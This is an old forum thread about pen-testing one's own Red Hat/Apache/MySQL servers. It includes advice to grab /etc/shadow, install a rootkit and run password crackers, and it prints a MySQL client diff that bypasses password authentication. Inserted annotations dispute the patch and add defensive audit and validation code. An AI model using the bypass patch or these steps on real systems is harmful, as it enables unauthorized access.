Solved

How to hack my server

Posted on 2004-08-27
Last Modified: 2008-01-09
To all,

I would like to try to hack our dev servers (they are a replication of our production servers).  We have implemented several new layers of security including a Cisco Pix 501 firewall and IPTables.  But I am hoping somebody can shed some light on how I would go about trying to hack my own server to ensure they are secure.  We already do port scanning to ensure there aren't any extra open ports that aren't being used.  Are there applications that I can use for password hacking? etc.  Thanks for the help in advance.

Specs: (Three tier architecture)
RH 9.0
Apache 2.0.40
MySQL 4.0.2
Jrun4 w/ CFMX
Question by:chigs20
5 Comments
 
LVL 5

Accepted Solution

by:
Chireru earned 250 total points
ID: 11918435
For every port that is open, check the version of the daemon that is holding the port open, and see if there are any unpatched exploits available for that daemon.  Bugtraq is a good place to start looking for the advisories.

Next, I would suggest logging into an anonymous or guest account, and seeing how many files you can delete, and what you can touch that you shouldn't be able to.  Also try this as a regular user.  See if you can get a copy of /etc/shadow.  Check what processes are running, and see if there are any exploits for them.  Do a Google search for "rootkit", see about downloading one and installing it, and see if you can take over the box from a regular user.

As long as it's updated, the PIX can take most of the network-based attacks, all you have to look out for now is exploits, and guests and regular users doing things they shouldn't be doing (like installing rootkits).
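The "what can a guest or regular user touch that they shouldn't" test above can be turned into a repeatable permission audit. The following is an added example, not code from this thread or from Red Hat; it builds a constructed sample tree in a temp directory and flags world-writable files, setuid/setgid binaries, and a shadow file readable by anyone but root.

```python
"""Added example (constructed): audit a tree for access a regular or guest
user should not have.  The sample tree is built in a temp dir so the script
runs anywhere; point audit_tree() at / (as root) for a real check."""
import os
import stat
import tempfile


def audit_tree(root):
    """Return a dict of finding lists for every regular file under root."""
    findings = {"world_writable": [], "setuid_setgid": [], "shadow_readable": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            if not stat.S_ISREG(mode):
                continue  # skip symlinks, sockets, devices
            if mode & stat.S_IWOTH:
                findings["world_writable"].append(path)
            if mode & (stat.S_ISUID | stat.S_ISGID):
                findings["setuid_setgid"].append(path)
            # /etc/shadow must not be group- or world-readable
            if name == "shadow" and mode & (stat.S_IRGRP | stat.S_IROTH):
                findings["shadow_readable"].append(path)
    return findings


def build_sample_tree():
    """Constructed tree containing the mistakes the audit looks for."""
    root = tempfile.mkdtemp(prefix="audit_")
    etc = os.path.join(root, "etc")
    os.mkdir(etc)
    bin_dir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bin_dir)

    def write(path, mode):
        with open(path, "w") as fh:
            fh.write("x\n")
        os.chmod(path, mode)

    write(os.path.join(etc, "shadow"), 0o644)        # should be 0600 or 0000
    write(os.path.join(etc, "passwd"), 0o644)        # fine, passwd is public
    write(os.path.join(bin_dir, "helper"), 0o4755)   # setuid binary, review it
    write(os.path.join(root, "upload.cgi"), 0o666)   # world-writable script
    return root


if __name__ == "__main__":
    for kind, paths in audit_tree(build_sample_tree()).items():
        print(kind, paths)
```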
 
LVL 17

Expert Comment

by:owensleftfoot
ID: 11918653
Give nessus a go. http://www.nessus.org/
 
LVL 16

Expert Comment

by:xDamox
ID: 11926202
The version of MySQL is vulnerable to a NULL password:

Vulnerable Systems:
 * MySQL version 4.1 up to but not including 4.1.3
 * MySQL version 5.0

Immune Systems:
 * MySQL version 4.1.3

The diff patch can only be used against the latest alpha version (5.0.0) of MySQL. In order to use it, follow the following steps:

 * Download and unpack the MySQL 5.0.0-alpha source
 * Patch the sql-common/client.c file:
    sql-common/ $ patch client.c mysql.authentication.bypass_client.c.diff
 * Configure and Make as usual

The resultant MySQL client binary can then be used normally but with one exception: The user can completely disregard the password and in fact can enter any password and it would not matter. The provided diff patch:
1941,1956c1941,1942
<   if (passwd[0])
<   {
<     if (mysql->server_capabilities & CLIENT_SECURE_CONNECTION)
<     {
<       *end++= SCRAMBLE_LENGTH;
<       scramble(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH;
<     }
<     else
<     {
<       scramble_323(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH_323 + 1;
<     }
<   }
<   else
<     *end++= '\0';                               /* empty password */
---
>   sprintf(end,"\x14\x00");
>   end+=2;
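Review bot: the replacement `>   sprintf(end,"\x14\x00");` / `>   end+=2;` discards both branches the original block chose between (the `CLIENT_SECURE_CONNECTION` scramble and the `scramble_323` fallback), so the built client ignores server capabilities entirely and will not work against older servers either; it always emits a length byte of 0x14 (`SCRAMBLE_LENGTH`) with no scramble bytes behind it, which is why a server that validates the password field, as the "Immune Systems" entry 4.1.3 above implies, rejects it. As a test for the asker this is also not applicable: the vulnerable list given is 4.1.x below 4.1.3 and 5.0, while the question states MySQL 4.0.2, and the patch context is for the 5.0.0-alpha tree only, so it should not be applied to a 4.0 checkout.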


Also, to check your security, use a password cracker on your own system and see if it can crack them.
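The hunk above makes the client declare a 20-byte scramble (0x14) and then send nothing, so the server-side question is whether the password field is checked for internal consistency. The following is an added example, not MySQL's code and not from this thread: a parser for the 4.1-style field (one length byte followed by that many scramble bytes, as the original `*end++= SCRAMBLE_LENGTH; scramble(...)` lines imply) that rejects the truncated field; the assumption that this is the inconsistency the immune 4.1.3 rejects is mine, since the page shows only the client side. The 3.23 null-terminated path is not modelled.

```python
"""Added example (constructed, not MySQL source): validate the 4.1-style
password field of a client authentication packet before using it."""
SCRAMBLE_LENGTH = 20  # 4.1 scramble size, the 0x14 written by the hunk


def parse_password_field(buf):
    """Return (scramble_bytes, rest_of_packet) or raise ValueError.

    Layout assumed here: one length byte, then exactly that many scramble
    bytes, then whatever follows (e.g. the database name).  Only an empty
    password (0) or a full scramble (20) is a legal declared length.
    """
    if not buf:
        raise ValueError("missing length byte")
    declared = buf[0]
    body = buf[1:]
    if declared not in (0, SCRAMBLE_LENGTH):
        raise ValueError(f"unexpected scramble length {declared}")
    # The check the bypass depends on being absent: the declared length
    # must not exceed what the client actually sent.
    if len(body) < declared:
        raise ValueError(f"declared {declared} scramble bytes, got {len(body)}")
    return body[:declared], body[declared:]


def is_well_formed(buf):
    """True when the field parses, False for any malformed field."""
    try:
        parse_password_field(buf)
        return True
    except ValueError:
        return False


# Constructed packets: what the patched client from the hunk emits versus a
# legitimate client (scramble bytes 0..19 stand in for a real hash).
BYPASS_ATTEMPT = b"\x14\x00"                                   # length 20, no bytes
LEGIT_PACKET = bytes([SCRAMBLE_LENGTH]) + bytes(range(20)) + b"mydb\x00"
EMPTY_PASSWORD = b"\x00" + b"mydb\x00"                         # legal empty password

if __name__ == "__main__":
    for label, pkt in (("bypass", BYPASS_ATTEMPT), ("legit", LEGIT_PACKET),
                       ("empty", EMPTY_PASSWORD)):
        print(label, "accepted" if is_well_formed(pkt) else "rejected")
```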
 
LVL 9

Expert Comment

by:_GeG_
ID: 11947497
just tell us your ip ;)
 
LVL 51

Assisted Solution

by:ahoffmann
ahoffmann earned 250 total points
ID: 11982587
Which kind of penetration test are you interested in?
 a) host and/or network
 b) any application
 c) web application

for a) see nmap (or nessus), for b) nmap again and some specialized tools too, and for c) you need $$$$$
